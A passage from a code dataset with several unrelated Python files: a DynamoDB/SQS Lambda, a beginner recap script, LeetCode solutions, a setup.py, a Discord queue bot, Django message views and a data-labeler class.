{new_item['title']}\")\n new_item_d = ddbjson.dumps(new_item, as_dict=True)\n ddb_client.put_item(TableName=table_name, Item=new_item_d)\n else:\n print(\">>> No new items to create\")\n\n #--\n #-- UPDATE ITEMS IN DYNAMODB\n #--\n if len(updated_items) > 0:\n for updated_item in updated_items:\n item_id = updated_item['id']\n print(f\"*** Updating item: id={item_id}\")\n expr_attr_vals = {}\n expr_attr_nams = {}\n upd_exprs_set = [] # list of \"attribute token = value token\" strings for SET\n upd_exprs_rem = [] # list of attribute tokens to REMOVE\n for i, attr in enumerate(updated_item.keys()):\n if attr != 'id':\n attr_alias = conv_attr_str(attr)\n attr_token = f\"#{attr_alias}\"\n valu_token = f\":{attr_alias}\"\n expr_attr_nams[attr_token] = attr\n if updated_item[attr] == \"\":\n upd_exprs_rem.append(attr_token)\n else:\n expr_attr_vals[valu_token] = {'S': updated_item[attr] }\n upd_exprs_set.append(f\"{attr_token}={valu_token}\")\n\n upd_expr = \"\"\n if len(upd_exprs_set) > 0:\n upd_expr += \"SET \" + ','.join(upd_exprs_set)\n if len(upd_exprs_rem) > 0:\n upd_expr += \" REMOVE \" + ','.join(upd_exprs_rem)\n print(\"*** - UPDATE EXPR: \", upd_expr)\n \n ddb_client.update_item(\n TableName=table_name,\n Key={\"id\": {'S': item_id}},\n ExpressionAttributeValues=expr_attr_vals,\n ExpressionAttributeNames=expr_attr_nams,\n UpdateExpression=upd_expr\n )\n else:\n print(\">>> No items to update\")\n\n #--\n #-- IF THERE WERE ANY CHANGES, TRIGGER THE NOW PAGE CONTENT GENERATOR\n #--\n\n if (len(updated_items)>0) or (len(new_items)>0):\n print(\"*** Sending message to SQS queue (to trigger NOW page rebuild)\")\n # GET SQS CLIENT\n sqs_client = boto3.client('sqs')\n resp_sqs = sqs_client.send_message(\n QueueUrl = 'https://sqs.us-east-2.amazonaws.com/400999793714/now-page-triggers',\n MessageBody = '{}'\n )\n","repo_name":"mihobu/mihobu.omg.lol","sub_path":"goodreadsbot/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":11734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3484951883","text":"#!/usr/bin/python3\n\n# tipos de dados e variaveis\n\nstring = 'Isso é uma string'\ninteiro = 10\nflutuante = 10.6\n\n\n#entrada e saida\n\nnome = input('Digite seu nome: ') #entrada de dados\nprint (nome) #saida\nimport keyword\n\nprint (f'palavras que não podem ser usadas para atribuir variáveis {keyword.kwlist}')\n\n#estrutura de dados\n\n##listas\n\nitens = [1, 2.0, 'string', [1,6,9], 'uva']\nitens.append('novo item')\nitens.remove(2.0)\nitens.pop(2)\nitens.insert(4, 'Outra coisa')\nitens[1] = 'Novo valor'\n\n\nprint(itens[3])\n\n\n##tuplas - são imutaveis\n\ndado = (10, 2.0, 'Teste', True)\n\n##dicionário\n\ndados = {'nome': 'Renato',\n 'Idade': 27,\n 'Linguagem preferida': 'Python e GO'\n}\n\ndados.keys()\ndados.values()\n\n\n#estrutura de repeticão\n\n## while\n\nusers = ['Barbara', 'Carlos', 'Ramon']\nwhile True:\n login = input('Digite ser login: ')\n if login in users:\n print('Acesso permitido')\n break\n else:\n print('Acesso Negado')\n continue\n\nfor index,nome in enumerate(users):\n print(index, nome)\n\n\n\n\n","repo_name":"FabioGUB/Python.Fundamentals-","sub_path":"aula2/recap.py","file_name":"recap.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18206821542","text":"class Solution:\n def findRotateSteps(self, ring: str, key: str) -> int:\n # Number of rotates of ring to match key[index:]\n @functools.lru_cache(None)\n def dfs(ring: str, index: int) -> int:\n if index == len(key):\n return 0\n\n ans = math.inf\n\n # For each ring[i] == key[index]\n # We rotate the ring to match ring[i] w/ key[index]\n # Then recursively match newRing w/ key[index + 1:]\n for i, r in enumerate(ring):\n if r == key[index]:\n minRotates = min(i, len(ring) - i)\n newRing = ring[i:] + ring[:i]\n remainingRotates = dfs(newRing, index + 1)\n ans = min(ans, minRotates + remainingRotates)\n\n return ans\n\n return dfs(ring, 0) + len(key)\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0514. Freedom Trail/0514.py","file_name":"0514.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"29806453848","text":"from setuptools import setup, find_packages\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE') as f:\n license = f.read()\n\nsetup(\n name='py1337',\n version='1.0.0',\n description='Post 1337 to an Whatsapp group at 13:37.',\n url='https://github.com/DomiDre/py1337',\n author='Dominique Dresen',\n author_email='dominiquedresen@gmail.com',\n license=license,\n long_description=readme,\n install_requires=[\n 'selenium'\n ],\n python_requires='>2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*',\n platforms=['Linux'],\n package_dir={'py1337': 'py1337'},\n packages=find_packages(\n exclude=(\n '_build',\n 'docs',\n '_static',\n '_templates'\n 'tests',\n 'examples'\n )\n ),\n keywords='whatsapp 1337'\n)","repo_name":"DomiDre/py1337","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37219055681","text":"# Definition for a Node.\nclass Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n self.parent = None\n\n\nclass Solution:\n def lowestCommonAncestor(self, p: 'Node', q: 'Node') -> 'Node':\n def dfs(path, node): # this is to find the path lead to the node - output format: from node to root\n if node.parent == None:\n path.append(node)\n else:\n path.append(node)\n dfs(path, node.parent)\n\n def compare(arr1, arr2):\n if arr1[0] != arr2[0]: # if the root node is not the same, no need to compare anymore\n return None\n output = arr1[0]\n while arr1 and arr2:\n A = arr1.pop(0)\n B = arr2.pop(0)\n if A == B:\n output = A\n return output\n\n p_up = []\n q_up = []\n dfs(p_up, p)\n dfs(q_up, q)\n\n return compare(p_up[::-1], q_up[::-1]) # compare from root to bottom\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"renjieliu/leetcode","sub_path":"1500_1999/1650.py","file_name":"1650.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"30656313704","text":"# Ch.03.4 Performace of 365 Day Skill Up\n# Start with 1, only the first 10 days in every month has skill improve N, rest of the month are flat\n\n# import math\n\n\ndef dayUP(df):\n dayup = 1\n\n for i in range(365):\n if i % 30 in [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]:\n dayup = dayup * (1 + df)\n else:\n dayup = dayup * (1)\n\n return dayup\n\n\n# dayfactor = (0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.10)\ndayfactor = (0.001, 0.002, 0.003, 0.004, 0.005, 0.006, 0.007, 0.008, 0.009, 0.010)\n\nprint(\"365 Days, 6 contiune working day with skill up factor, rest 1 days are flat.\")\n\nfor i in range(len(dayfactor)):\n # print(\"Factor {:.2f}: {:.2f}\".format(dayfactor[i], dayUP(dayfactor[i])))\n print(\"Factor {:.3f}: {:.3f}\".format(dayfactor[i], dayUP(dayfactor[i])))\n","repo_name":"TomFoxLee/Python543","sub_path":"PYECourse/Ch.03/e3.15_365DaySkillUp.py","file_name":"e3.15_365DaySkillUp.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19373590130","text":"import logging\nimport socket\n\nlogger = logging.getLogger(__name__)\n\n\nclass RPCMessageClient:\n\n def __init__(self, portNumber: int) -> None:\n self._serverAddress = ('127.0.0.1', portNumber)\n\n def send(self, message: str) -> str:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n sock.connect(self._serverAddress)\n\n sock.sendall((message + '\\n').encode('utf-8'))\n logger.debug(f'SEND: \\\"{message}\\\"')\n\n with sock.makefile(mode='r', encoding='utf-8') as fp:\n response = fp.readline()\n\n logger.debug(f'RECV: \\\"{response}\\\"')\n\n return response\n","repo_name":"AdvancedPhotonSource/ptychodus","sub_path":"ptychodus/model/rpc/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"24105806021","text":"import pandas as pd\n\n# load the data\ndata = pd.read_csv('input/event_data.csv', sep='|')\ntext = data.text.dropna()\ntext = '\\n'.join(text)\n\n# write the data into a text file\n\nwith open('input/training_text.txt', 'w') as file:\n file.write(text)\n","repo_name":"KhalilAMARDJIA/doccano_spacy_fda","sub_path":"raw_to_text.py","file_name":"raw_to_text.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38989742805","text":"from logging import warning\nimport discord\nfrom discord import channel\nfrom discord import guild\nfrom discord.ext import commands\nimport asyncio\n\n\nclass MyClient(discord.Client):\n waitingQueue = [] #Holds all members waiting in the queue\n roomIDs = [809454410543530014, 809454540504039424, 809454553790545950] #The IDs of the Lab \"Rooms\"\n staffList = []\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.bg_task = self.loop.create_task(self.loopQueue())\n\n async def on_ready(self): #Runs on ready\n print('Logged in as')\n print(self.user.name)\n print(self.user.id)\n print('------')\n await self.getStaff()\n\n async def loopQueue(self):\n await self.wait_until_ready()\n while not self.is_closed():\n for cID in self.roomIDs:\n if len(self.waitingQueue) == 0:\n break\n for member in self.waitingQueue:\n channel = discord.utils.get(client.guild.voice_channels, id=cID)\n if len(channel.members) == 1:\n for staffmember in channel.members:\n if self.staffList.__contains__(staffmember):\n await member.move_to(channel)\n self.waitingQueue.pop(0)\n await asyncio.sleep(60)\n\n async def getStaff(self):\n self.staffList.clear()\n for member in self.get_all_members():\n for role in member.roles:\n if str(role) == \"Helper\" and not self.staffList.__contains__(member):\n self.staffList.append(member)\n\n async def checkPermissions(self, message):\n return message.author.id == 618876946830589963\n #Can be made so it checks for a role \n\n async def on_message(self, message):\n if message.author.id == self.user.id: #Stops the bot responding to itself\n return\n\n if message.channel.id != 809454274392227870: #Restrains commands to a single channel\n return\n\n if message.content.startswith(\"!queue\") or message.content.startswith(\"!q\"): #Queues members\n if not self.waitingQueue.__contains__(message.author):\n if message.author.voice is None:\n await message.channel.send((message.author.mention + \": Please join ``🔈 waiting-room`` to queue.\"))\n elif message.author.voice.channel.id == 809454365164568626:\n self.waitingQueue.append(message.author)\n await message.add_reaction(\"✅\")\n else:\n await message.channel.send((message.author.mention + \": Please join ``🔈 waiting-room`` to queue.\"))\n elif self.waitingQueue.__contains__(message.author):\n await message.delete()\n\n if message.content.startswith(\"!pos\") or message.content.startswith(\"!position\") or message.content.startswith(\"!p\"): #Shows those queued their position\n if self.waitingQueue.__contains__(message.author):\n await message.channel.send(message.author.mention + \": You are position ``\" + str(self.waitingQueue.index(message.author) + 1) + \"``.\")\n else:\n await message.channel.send((message.author.mention + \": You are not in the queue.\"))\n\n if message.content.startswith(\"!vc\") and await self.checkPermissions(message): #Temporary command. Will become automatic\n await self.wait_until_ready()\n while not self.is_closed():\n for cID in self.roomIDs:\n if len(self.waitingQueue) == 0:\n break\n for member in self.waitingQueue:\n channel = discord.utils.get(message.guild.voice_channels, id=cID)\n if len(channel.members) == 1:\n for staffmember in channel.members:\n if self.staffList.__contains__(staffmember):\n await member.move_to(channel)\n self.waitingQueue.pop(0)\n await asyncio.sleep(60)\n\n if message.content.startswith(\"!clear\") and await self.checkPermissions(message): #Clears the channel and shows the help dialog box at the start of the channel.\n await message.channel.send(\"Deleting... Please wait, depending on the number of messages this may take a minute.\")\n await message.channel.purge()\n embed=discord.Embed(title=\"Commands\", description=\"QueueBot Commands\", color=0xedcf07)\n embed.add_field(name=\"!queue / !q\", value=\"Enters you into the queue for labs\", inline=False)\n embed.add_field(name=\"!position / !p\", value=\"Shows current position in the queue\", inline=False)\n await message.channel.send(embed=embed)\n\n if message.content.startswith(\"!help\"): #Shows the help dialogue\n embed=discord.Embed(title=\"Commands\", description=\"QueueBot Commands\", color=0xedcf07)\n embed.add_field(name=\"!queue / !q\", value=\"Enters you into the queue for labs\", inline=False)\n embed.add_field(name=\"!position / !p\", value=\"Shows current position in the queue\", inline=False)\n await message.channel.send(embed=embed)\n\n\nclient=MyClient()\nftoken = open(\"token\", \"r\") #Reads in the token needed for bot authentication\ntoken = ftoken.read().strip(\"\\n\") \nclient.run(token)\n","repo_name":"TheTrueShell/QueueBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2884694444","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import redirect, render, get_object_or_404\n\nfrom djarbler.forms import CsrfOnlyForm\nfrom users.models import User\nfrom .forms import MessageCreateForm\nfrom .models import Message\n\n\n@login_required\ndef create(request):\n \"\"\"Create a new message.\"\"\"\n\n if request.method == \"POST\":\n form = MessageCreateForm(request.POST)\n if form.is_valid():\n form.instance.user = request.user\n form.save()\n messages.success(request, \"Warble saved.\")\n return redirect(\"/\")\n else:\n form = MessageCreateForm()\n return render(request, \"warbles/new.html\", {\"form\": form})\n\n\n@login_required\ndef messages_show(request, message_id):\n \"\"\"Show a message.\"\"\"\n\n msg = get_object_or_404(Message, pk=message_id)\n return render(request, 'warbles/show.html', {\"message\": msg})\n\n\n@login_required\ndef messages_destroy(request, message_id):\n \"\"\"Delete a message.\"\"\"\n\n form = CsrfOnlyForm(request.POST)\n msg = get_object_or_404(Message, pk=message_id)\n\n if (request.method != \"POST\" or\n not form.is_valid() or\n msg.user != request.user):\n raise PermissionDenied()\n\n messages.warning(request, \"Message deleted.\")\n msg.delete()\n\n return redirect(f\"/users/{request.user.id}/\")\n\n\n@login_required\ndef toggle_like(request, message_id):\n \"\"\"Toggle a liked message for the currently-logged-in user.\"\"\"\n\n form = CsrfOnlyForm(request.POST)\n user: User = request.user\n\n if request.method != \"POST\" or not form.is_valid():\n raise PermissionDenied()\n\n liked_message = get_object_or_404(Message, pk=message_id)\n if liked_message.user == user:\n raise PermissionDenied(\n \"You're so vain, you probably think this error is about you.\")\n\n if user.liked_messages.contains(liked_message):\n messages.success(request, \"Un-liked.\")\n user.liked_messages.remove(liked_message)\n else:\n messages.success(request, \"Liked.\")\n user.liked_messages.add(liked_message)\n\n return redirect(\"/\")\n","repo_name":"joelburton/djarbler","sub_path":"warbles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12540753405","text":"def mergeSort(start,end):\n if start None:\n \"\"\"\n Initialize DataLabeler class.\n\n :param dirpath: path to data labeler\n :param load_options: optional arguments to include for load i.e. class\n for model or processors\n \"\"\"\n if dirpath is not None and not isinstance(dirpath, str):\n raise ValueError(\n \"`dirpath` must be a file directory where a \" \"DataLabeler exists.\"\n )\n # Example: self._model is an instance of BaseModel\n self._model: BaseModel = None # type: ignore\n\n # Example: self._preprocessor and self._postprocessor are instances of\n # DataProcessing\n self._preprocessor: data_processing.BaseDataPreprocessor = None # type: ignore\n self._postprocessor: data_processing.BaseDataPostprocessor = (\n None # type: ignore\n )\n\n # load default model\n if dirpath or self._default_model_loc:\n if dirpath is None:\n dirpath = os.path.join(default_labeler_dir, self._default_model_loc)\n self._load_data_labeler(dirpath, load_options)\n\n def __eq__(self, other: object) -> bool:\n \"\"\"\n Check if two data labelers are equal with one another.\n\n Only checks important variables.\n\n :param self: a data labeler\n :param other: a data labeler\n :type self: BaseDataLabeler\n :type other: BaseDataLabeler\n :return: Whether or not self and other are equal\n :rtype: Bool\n \"\"\"\n if not isinstance(other, BaseDataLabeler):\n return False\n if (\n self._preprocessor != other.preprocessor\n or self._model != other.model\n or self._postprocessor != other.postprocessor\n ):\n return False\n return True\n\n def help(self) -> None:\n \"\"\"\n Describe alterable parameters.\n\n Input data formats for preprocessors.\n Output data formats for postprocessors.\n\n :return: None\n \"\"\"\n print(\"DataLabeler Information:\")\n print(\"=\" * 80)\n sys.stdout.write(\"Preprocessor: \")\n self._preprocessor.help()\n\n print(\"\\n\" + \"=\" * 80)\n sys.stdout.write(\"Model: \")\n self._model.help()\n\n print(\"\\n\" + \"=\" * 80)\n sys.stdout.write(\"Postprocessor: \")\n self._postprocessor.help()\n\n @property\n def label_mapping(self) -> dict:\n \"\"\"\n Retrieve the label encodings.\n\n :return: dictionary for associating labels to indexes\n \"\"\"\n return self._model.label_mapping\n\n @property\n def reverse_label_mapping(self) -> dict:\n \"\"\"\n Retrieve the index to label encoding.\n\n :return: dictionary for associating indexes to labels\n \"\"\"\n return self._model.reverse_label_mapping\n\n @property\n def labels(self) -> list[str]:\n \"\"\"\n Retrieve the label.\n\n :return: list of labels\n \"\"\"\n return self._model.labels\n\n @property\n def preprocessor(self) -> data_processing.BaseDataPreprocessor | None:\n \"\"\"\n Retrieve the data preprocessor.\n\n :return: returns the preprocessor instance\n \"\"\"\n return self._preprocessor\n\n @property\n def model(self) -> BaseModel:\n \"\"\"\n Retrieve the data labeler model.\n\n :return: returns the model instance\n \"\"\"\n return self._model\n\n @property\n def postprocessor(self) -> data_processing.BaseDataPostprocessor | None:\n \"\"\"\n Retrieve the data postprocessor.\n\n :return: returns the postprocessor instance\n \"\"\"\n return self._postprocessor\n\n @staticmethod\n def _check_and_return_valid_data_format(\n data: DataArray, fit_or_predict: str = \"fit\"\n ) -> DataArray:\n \"\"\"\n Check incoming data to match the specified fit or predict format.\n\n :param data: data to check\n :type data: Union[pandas.DataFrame, pandas.Series, numpy.array, list]\n :param fit_or_predict: if the data needs to be in fit or predict format\n :type fit_or_predict: str\n :return: validated and formatted data\n \"\"\"\n if fit_or_predict not in [\"fit\", \"predict\"]:\n raise ValueError(\"`fit_or_predict` must equal `fit` or `predict`\")\n\n # Pull dataframe out of data reader object\n if isinstance(data, data_readers.base_data.BaseData):\n data = data.data\n\n if isinstance(data, list):\n data = np.array(data, dtype=\"object\")\n elif isinstance(data, pd.Series) or isinstance(data, pd.DataFrame):\n data = data.values\n elif not isinstance(data, np.ndarray):\n raise TypeError(\n \"Data must be imported using the data_readers, \"\n \"pd.DataFrames, np.ndarrays, or lists.\"\n )\n\n if fit_or_predict == \"fit\":\n return data\n else:\n return np.reshape(data, -1)\n\n def set_params(self, params: dict) -> None:\n \"\"\"\n Allow user to set parameters of pipeline components.\n\n Done in the following format:\n params = dict(\n preprocessor=dict(...),\n model=dict(...),\n postprocessor=dict(...)\n )\n where the key,values pairs for each pipeline component must match\n parameters that exist in their components.\n\n :param params: dictionary containing a key for a given pipeline\n component and its associated value of parameters as such:\n dict(preprocessor=dict(...), model=dict(...),\n postprocessor=dict(...))\n :type params: dict\n :return: None\n \"\"\"\n is_params_error = True\n if params and isinstance(params, dict):\n unknown_keys = set(params.keys()) - {\n \"preprocessor\",\n \"model\",\n \"postprocessor\",\n }\n if not unknown_keys:\n is_params_error = False\n\n if is_params_error:\n raise ValueError(\n \"The params dict must have the following format:\\n\"\n \"params=dict(preprocessor=dict(...), model=dict(...), \"\n \"postprocessor=dict(...)), where each sub-dict contains \"\n \"parameters of the specified data_labeler pipeline components.\"\n )\n elif (\n not self._preprocessor\n and \"preprocessor\" in params\n or not self._model\n and \"model\" in params\n or not self._postprocessor\n and \"postprocessor\" in params\n ):\n raise ValueError(\n \"Parameters for the preprocessor, model, or postprocessor were \"\n \"specified when one or more of these were not set in the \"\n \"DataLabeler.\"\n )\n\n if self._preprocessor and \"preprocessor\" in params:\n self._preprocessor.set_params(**params[\"preprocessor\"])\n if self._model and \"model\" in params:\n self._model.set_params(**params[\"model\"])\n if self._postprocessor and \"postprocessor\" in params:\n self._postprocessor.set_params(**params[\"postprocessor\"])\n\n self.check_pipeline(\n skip_postprocessor=self._postprocessor is None, error_on_mismatch=False\n )\n\n def add_label(self, label: str, same_as: str = None) -> None:\n \"\"\"\n Add a label to the data labeler.\n\n :param label: new label being added to the data labeler\n :type label: str\n :param same_as: label to have the same encoding index as for multi-label\n to single encoding index.\n :type same_as: str\n :return: None\n \"\"\"\n self._model.add_label(label, same_as)\n\n def set_labels(self, labels: list | dict) -> None:\n \"\"\"\n Set the labels for the data labeler.\n\n :param labels: new labels in either encoding list or dict\n :type labels: list or dict\n :return: None\n \"\"\"\n # convert to valid format\n self._model.set_label_mapping(label_mapping=labels)\n\n def predict(\n self,\n data: DataArray,\n batch_size: int = 32,\n predict_options: dict[str, bool] = None,\n error_on_mismatch: bool = False,\n verbose: bool = True,\n ) -> dict:\n \"\"\"\n Predict labels of input data based with the data labeler model.\n\n :param data: data to be predicted upon\n :type data: Union[pd.DataFrame, pd.Series, np.ndarray]\n :param batch_size: batch size of prediction\n :type batch_size: int\n :param predict_options: optional parameters to allow for predict as a\n dict, i.e. dict(show_confidences=True)\n :type predict_options: Dict[str, bool]\n :param error_on_mismatch: if true, errors instead of warns on parameter\n mismatches in pipeline\n :type error_on_mismatch: bool\n :param verbose: Flag to determine whether to print status or not\n :type verbose: bool\n :return: predictions\n :rtype: Dict\n \"\"\"\n if predict_options is None:\n predict_options = {}\n data = self._check_and_return_valid_data_format(data, fit_or_predict=\"predict\")\n\n # check for valid pipeline\n self.check_pipeline(\n skip_postprocessor=False, error_on_mismatch=error_on_mismatch\n )\n\n # preprocess\n samples = self._preprocessor.process(data, batch_size=batch_size)\n\n # predicting:\n results = self._model.predict(\n samples,\n batch_size,\n show_confidences=predict_options.get(\"show_confidences\", False),\n verbose=verbose,\n )\n\n # postprocessing:\n results = self._postprocessor.process(data, results, self.label_mapping)\n\n return results\n\n def set_preprocessor(\n self, data_processor: data_processing.BaseDataPreprocessor\n ) -> None:\n \"\"\"\n Set the data preprocessor for the data labeler.\n\n :param data_processor: processor to set as the preprocessor\n :type data_processor: data_processing.BaseDataPreprocessor\n :return: None\n \"\"\"\n if not isinstance(data_processor, data_processing.BaseDataPreprocessor):\n raise TypeError(\n \"The specified preprocessor was not of the correct\"\n \" type, `DataProcessing`.\"\n )\n self._preprocessor = data_processor\n\n def set_model(self, model: BaseModel) -> None:\n \"\"\"\n Set the model for the data labeler.\n\n :param model: model to use within the data labeler\n :type model: base_model.BaseModel\n :return: None\n \"\"\"\n if not isinstance(model, BaseModel):\n raise TypeError(\n \"The specified model was not of the correct\" \" type, `BaseModel`.\"\n )\n self._model = model\n\n def set_postprocessor(\n self, data_processor: data_processing.BaseDataPostprocessor\n ) -> None:\n \"\"\"\n Set the data postprocessor for the data labeler.\n\n :param data_processor: processor to set as the postprocessor\n :type data_processor: data_processing.BaseDataPostprocessor\n :return: None\n \"\"\"\n if not isinstance(data_processor, data_processing.BaseDataPostprocessor):\n raise TypeError(\n \"The specified postprocessor was not of the \"\n \"correct type, `DataProcessing`.\"\n )\n self._postprocessor = data_processor\n\n def check_pipeline(\n self, skip_postprocessor: bool = False, error_on_mismatch: bool = False\n ) -> None:\n \"\"\"\n Check whether the processors and models connect together without error.\n\n :param skip_postprocessor: skip checking postprocessor is valid in\n pipeline\n :type skip_postprocessor: bool\n :param error_on_mismatch: if true, errors instead of warns on parameter\n mismatches in pipeline\n :type error_on_mismatch: bool\n :return: None\n \"\"\"\n messages = []\n\n def get_parameter_overlap_mismatches(\n param_dict1: dict, param_dict2: dict\n ) -> list[str]:\n \"\"\"\n Get mismatching parameters in dictionary if same key exists.\n\n :param param_dict1: 1st set of dictionary of parameters\n :type param_dict1: dict\n :param param_dict2: 2nd set of dictionary of parameters\n :type param_dict2: dict\n :return: list of mismatching parameters\n :rtype: List[str]\n \"\"\"\n param_mismatch_overlaps = []\n for key in param_dict1:\n if key in param_dict2 and param_dict1[key] != param_dict2[key]:\n param_mismatch_overlaps.append(key)\n return param_mismatch_overlaps\n\n model_params = self._model.get_parameters()\n preprocessor_params = self._preprocessor.get_parameters()\n\n mismatch_overlaps = get_parameter_overlap_mismatches(\n model_params, preprocessor_params\n )\n for param in mismatch_overlaps:\n messages.append(\n \"Model and preprocessor value for `{}` do not match. {} != \"\n \"{}\".format(param, model_params[param], preprocessor_params[param])\n )\n\n if not skip_postprocessor:\n postprocessor_params = self._postprocessor.get_parameters()\n mismatch_overlaps = get_parameter_overlap_mismatches(\n model_params, postprocessor_params\n )\n for param in mismatch_overlaps:\n messages.append(\n \"Model and postprocessor value for `{}` do not match. \"\n \"{} != {}\".format(\n param, model_params[param], postprocessor_params[param]\n )\n )\n mismatch_overlaps = get_parameter_overlap_mismatches(\n preprocessor_params, postprocessor_params\n )\n for param in mismatch_overlaps:\n messages.append(\n \"Preprocessor and postprocessor value for `{}` do not \"\n \"match. {} != {}\".format(\n param, preprocessor_params[param], postprocessor_params[param]\n )\n )\n if messages:\n if error_on_mismatch:\n raise RuntimeError(\"\\n\".join(messages))\n warnings.warn(\"\\n\".join(messages), category=RuntimeWarning)\n\n @staticmethod\n def _load_parameters(dirpath: str, load_options: dict = None) -> dict[str, dict]:\n \"\"\"\n Load the data labeler parameters.\n\n :param dirpath: directory where the saved datalabeler exists.\n :type dirpath: str\n :param load_options: optional arguments to include for load i.e. class\n for model or processors\n :type load_options: dict\n :return: data labeler parameter dict\n :rtype: Dict[str, Dict]\n \"\"\"\n if not load_options:\n load_options = {}\n\n with open(os.path.join(dirpath, \"data_labeler_parameters.json\")) as fp:\n params: dict[str, dict] = json.load(fp)\n\n if \"model_class\" in load_options:\n model_class = load_options.get(\"model_class\")\n if not isinstance(model_class, BaseModel):\n raise TypeError(\"`model_class` must be a BaseModel\")\n param_model_class = params.get(\"model\", {}).get(\"class\", None)\n if param_model_class != model_class.__class__.__name__:\n raise ValueError(\n \"The load_options model class does not match \"\n \"the required DataLabeler model.\\n {} != {}\".format(\n model_class.__class__.__name__, param_model_class\n )\n )\n params[\"model\"][\"class\"] = model_class\n if \"preprocessor_class\" in load_options:\n processor_class = load_options.get(\"preprocessor_class\")\n if not isinstance(processor_class, data_processing.BaseDataPreprocessor):\n raise TypeError(\n \"`preprocessor_class` must be a \" \"BaseDataPreprocessor\"\n )\n param_processor_class = params.get(\"preprocessor\", {}).get(\"class\", None)\n if param_processor_class != processor_class.__class__.__name__:\n raise ValueError(\n \"The load_options preprocessor class does not \"\n \"match the required DataLabeler preprocessor.\"\n \"\\n {} != {}\".format(\n processor_class.__class__.__name__, param_processor_class\n )\n )\n params[\"preprocessor\"][\"class\"] = load_options.get(\"preprocessor_class\")\n if \"postprocessor_class\" in load_options:\n processor_class = load_options.get(\"postprocessor_class\")\n if not isinstance(processor_class, data_processing.BaseDataPostprocessor):\n raise TypeError(\n \"`postprocessor_class` must be a \" \"BaseDataPostprocessor\"\n )\n param_processor_class = params.get(\"postprocessor\", {}).get(\"class\", None)\n if param_processor_class != processor_class.__class__.__name__:\n raise ValueError(\n \"The load_options postprocessor class does not match \"\n \"the required DataLabeler postprocessor.\\n {} != {}\".format(\n processor_class.__class__.__name__, param_processor_class\n )\n )\n params[\"postprocessor\"][\"class\"] = load_options.get(\"postprocessor_class\")\n return params\n\n def _load_model(\n self, model_class: type[BaseModel] | str | None, dirpath: str\n ) -> None:\n \"\"\"\n Load the data labeler model.\n\n Can be done by either using a provided model class or\n retrieving a registered data labeler model.\n\n :param model_class: class of model being loaded\n :type model_class: Union[Type[BaseModel], str]\n :param dirpath: directory where the saved DataLabeler model exists.\n :type dirpath: str\n :return: None\n \"\"\"\n if isinstance(model_class, str):\n model_class = BaseModel.get_class(model_class)\n\n if not model_class:\n raise ValueError(\n \"`model_class`, {}, was not set in load_options \"\n \"and could not be found as a registered model \"\n \"class in BaseModel.\".format(str(model_class))\n )\n self.set_model(model_class.load_from_disk(dirpath))\n\n def _load_preprocessor(\n self,\n processor_class: type[data_processing.BaseDataProcessor] | str | None,\n dirpath: str,\n ) -> None:\n \"\"\"\n Load the preprocessor for the data labeler.\n\n :param processor_class: class of model being loaded\n :type processor_class: Union[data_processing.BaseDataProcessor, str]\n :param dirpath: directory where the saved DataLabeler model exists.\n :type dirpath: str\n :return: None\n \"\"\"\n if isinstance(processor_class, str):\n processor_class = data_processing.BaseDataProcessor.get_class(\n processor_class\n )\n if not processor_class:\n raise ValueError(\n \"`processor_class`, {}, was not set in load_options \"\n \"and could not be found as a registered model \"\n \"class in BaseDataProcessor.\".format(str(processor_class))\n )\n self.set_preprocessor(\n cast(\n data_processing.BaseDataPreprocessor,\n processor_class.load_from_disk(dirpath),\n )\n )\n\n def _load_postprocessor(\n self,\n processor_class: type[data_processing.BaseDataProcessor] | str | None,\n dirpath: str,\n ) -> None:\n \"\"\"\n Load the postprocessor for the data labeler.\n\n :param processor_class: class of model being loaded\n :type processor_class: Union[Type[data_processing.BaseDataPostprocessor], str]\n :param dirpath: directory where the saved DataLabeler model exists.\n :type dirpath: str\n :return: None\n \"\"\"\n if isinstance(processor_class, str):\n processor_class = data_processing.BaseDataProcessor.get_class(\n processor_class\n )\n if not processor_class:\n raise ValueError(\n \"`processor_class`, {}, was not set in \"\n \"load_options and could not be found as a \"\n \"registered model class in BaseDataProcessor.\".format(\n str(processor_class)\n )\n )\n self.set_postprocessor(\n cast(\n data_processing.BaseDataPostprocessor,\n processor_class.load_from_disk(dirpath),\n )\n )\n\n def _load_data_labeler(self, dirpath: str, load_options: dict 